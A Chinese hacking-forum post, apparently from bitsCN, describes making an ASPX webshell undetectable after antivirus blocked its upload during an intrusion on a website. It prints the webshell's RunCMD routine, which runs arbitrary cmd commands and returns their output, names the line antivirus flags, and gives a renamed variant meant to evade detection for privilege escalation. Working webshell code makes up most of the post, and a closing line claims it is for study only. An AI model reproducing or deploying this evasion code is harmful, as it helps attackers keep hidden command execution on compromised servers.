|
今天黑站的时候,经常用的aspx马怎么也上传不了,断定是被杀了。 中国网管论坛bbs.bitsCN.com
要提权就得用aspx马,怎么办呢?网上找不到免杀的马。无赖之下,只有找出马中的特征码。 网管论坛bbs_bitsCN_com
尝试了好久。终于找到了。LOOK: 网管联盟bitsCN_com
Sub RunCMD(Src As Object, E As EventArgs)
Dim myProcess As New Process()
Dim myProcessStartInfo As New ProcessStartInfo(cmdPath.Text)
myProcessStartInfo.UseShellExecute = False
myProcessStartInfo.RedirectStandardOutput = true
myProcess.StartInfo = myProcessStartInfo
myProcessStartInfo.Arguments="/c " & Cmd.text
myProcess.Start()
Dim myStreamReader As StreamReader = myProcess.StandardOutput
Dim myString As String = myStreamReader.Readtoend()
myProcess.Close()
mystring=replace(mystring,">","<")
mystring=replace(mystring,"<",">")
result.text="Command = " & Cmd.text & vbcrlf & "<ul class='td3'><pre>" & mystring & "</pre></ul>"
Cmd.text=""
End Sub 网管u家u.bitsCN.com
就是这段代码被定义了。准确的说是其中的myProcessStartInfo.RedirectStandardOutput = true这句有问题。 网管u家u.bitscn@com
可是要提权就要用到cmd.net ,删了还是不行。我的解决方法是把myProcess替换,比如上面代码可以替换成: 网管联盟bitsCN_com
Sub RunCMD(Src As Object, E As EventArgs)
Dim myRedzz As New Process()
Dim myRedzzStartInfo As New ProcessStartInfo(cmdPath.Text)
myRedzzStartInfo.UseShellExecute = False
myRedzzStartInfo.RedirectStandardOutput = true
myRedzz.StartInfo = myRedzzStartInfo
myRedzzStartInfo.Arguments="/c " & Cmd.text
myRedzz.Start()
Dim myStreamReader As StreamReader = myRedzz.StandardOutput
Dim myString As String = myStreamReader.Readtoend()
myRedzz.Close()
mystring=replace(mystring,">","<")
mystring=replace(mystring,"<",">")
result.text="Command = " & Cmd.text & vbcrlf & "<ul class='td3'><pre>" & mystring & "</pre></ul>"
Cmd.text=""
End Sub 网管u家u.bitscn@com
其中把myProcess替换成myRedzz,这样就达到了免杀效果。 网管联盟bitsCN_com
可是不是说就绝对免杀了。任何杀毒软件都有不同,需要不断尝试和探索。 网管联盟bitsCN_com
| 
评论加载中…
声明:刊登此文章是为了传递更多信息,文章内容仅供学习参考,转载请注明作者与出处。